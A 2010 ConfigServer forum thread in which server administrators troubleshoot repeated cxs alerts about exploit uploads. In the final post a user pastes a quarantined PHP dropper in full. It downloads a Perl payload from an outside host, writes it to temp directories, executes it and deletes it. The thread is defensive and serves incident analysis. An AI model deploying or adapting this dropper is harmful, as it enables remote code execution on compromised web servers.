ConfigServer Scripts Forum - View topic - cxs reports exploit upload using a file/directory that is no longer there?

ConfigServer Scripts Forum

FAQ • Search • Login

Register

View unanswered posts | View active topics

It is currently Wed Sep 08, 2010 5:02 pm

cxs reports exploit upload using a file/directory that is no longer there?

Page 1 of 1

[ 6 posts ]

Print view

Previous topic | Next topic

cxs reports exploit upload using a file/directory that is no longer there?

Author	Message
jols Junior Member Joined: Tue May 08, 2007 4:43 am Posts: 54	cxs reports exploit upload using a file/directory that is no longer there? I Just received the following report. The trouble is the /admin directory name within /merchandise was changed weeks ago. I'm not sure what to make of this one. Thanks for any advice! ------------------------------------------------------ Scanning web upload script file... Web upload script user: nobody (99) Web upload script owner: () Web upload script: /home/mcarson/public_html/merchandise/admin Remote IP: 75.22.20.39 Deleted: No Quarantined: No ----------- SCAN REPORT ----------- (/usr/sbin/cxs --quiet --cgi --mail root /tmp//20100531-001407-TANFn66EXQQAAD7DPM8AAAAL-file-swAgZV) # Known exploit = [Fingerprint Match]: '/tmp//20100531-001407-TANFn66EXQQAAD7DPM8AAAAL-file-swAgZV' # Regular expression match = [system\s\(\s\$_SERVER\[]: '/tmp//20100531-001407-TANFn66EXQQAAD7DPM8AAAAL-file-swAgZV'
Mon May 31, 2010 6:54 am

chirpy Moderator Joined: Sat Dec 09, 2006 7:13 pm Posts: 2522	The information about the script path and owner are all taken from the information passed by ModSecurity (or Suhosin if you're using that method) via the apache ENV variables. It seems to suggest that the scanned file was deleted during the scan somehow. This could happen, for example, if you have something like Symantecs antivirus running which removes files like this.
Mon Jun 14, 2010 2:49 pm

pmarek Junior Member Joined: Sat Jul 19, 2008 5:30 pm Posts: 9	I'm receiving a similar event. However, the emails keep coming, multiple times per day, day after day. When I run a cxs scan manually for the account in question, it does not show this event. 1. What is causing this to be repeatedly emailed eventhough cxs itself seems to not find the problem when run manually. 2. How do I/we stop the email from being sent for this when the directory in question is no longer there? Thanks.
Mon Jul 12, 2010 2:55 pm

pmarek Junior Member Joined: Sat Jul 19, 2008 5:30 pm Posts: 9	Does anyone know the answer to this?
Thu Jul 15, 2010 2:34 pm

Sergio Junior Member Joined: Tue Dec 12, 2006 3:56 pm Posts: 326	pmarek wrote: I'm receiving a similar event. However, the emails keep coming, multiple times per day, day after day. When I run a cxs scan manually for the account in question, it does not show this event. 1. What is causing this to be repeatedly emailed eventhough cxs itself seems to not find the problem when run manually. 2. How do I/we stop the email from being sent for this when the directory in question is no longer there? Thanks. Enter into your TMP directory and manually search for the file with the name: 20100531-001407-TANFn66EXQQAAD7DPM8AAAAL-file-swAgZV and delete it from there.
Fri Jul 16, 2010 7:06 pm

pmarek Junior Member Joined: Sat Jul 19, 2008 5:30 pm Posts: 9	Sergio, The file you reference was from a different user - however in my situation the referenced (as it appears in MY emails) does NOT exist in /tmp. I have enabled the quarantine and below is a copy of the script that was quarantined. Code: <?php ignore_user_abort(1); set_time_limit(0); function ex($cfe){ $res = ""; if (!empty($cfe)){ if(function_exists("exec")){ exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists("shell_exec")){ $res = shell_exec($cfe); } elseif(function_exists("system")){ ob_start(); system($cfe); $res = ob_get_contents(); ob_end_clean(); } elseif(function_exists("passthru")){ ob_start(); passthru($cfe); $res = ob_get_contents(); ob_end_clean(); } elseif(is_resource($f = popen($cfe,"r"))){ $res = ""; while(!feof($f)) { $res .= fread($f,1024); } pclose($f); }} return $res; } $fileorkut="http://renata.truehosting.com.br/sess_111269b2f548ca6564869bedec335112"; $handle = fopen($fileorkut, "rb"); $tudao = ""; while (!feof($handle)) { $tudao .= fread($handle, 8192); } fclose($handle); $handle=fopen("/tmp/sess_111269b2f548ca6564869bedec335112", "w+"); fwrite($handle, $tudao); fclose($handle); $handle=fopen("/var/tmp/sess_111269b2f548ca6564869bedec335112", "w+"); fwrite($handle, $tudao); fclose($handle); $handle=fopen("/dev/shm/sess_111269b2f548ca6564869bedec335112", "w+"); fwrite($handle, $tudao); fclose($handle); echo ex("cd /tmp;perl sess_111269b2f548ca6564869bedec335112"); echo ex("cd /var/tmp;perl sess_111269b2f548ca6564869bedec335112"); echo ex("cd /dev/shm;perl sess_111269b2f548ca6564869bedec335112"); echo ex("cd /tmp;rm sess_111269b2f548ca6564869bedec335112"); echo ex("cd /var/tmp;rm sess_111269b2f548ca6564869bedec335112"); echo ex("cd /dev/shm;rm sess_111269b2f548ca6564869bedec335112"); ?> Obviously this script is being uploaded but or injected. I can deny all the IPs where this comes from, but that isn't a solution. Ok so CXS "catches" this - but now the question becomes - how does one stop this form happening. I would have thought that mod security would have trapped and eliminated this. Am I misunderstanding something - did modsec disallow this? It shows in the modsec event list. Any clarity would be greatly appreciated. Much thanks in advance.
Thu Jul 29, 2010 2:39 pm
Display posts from previous: Sort by

Page 1 of 1

[ 6 posts ]

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.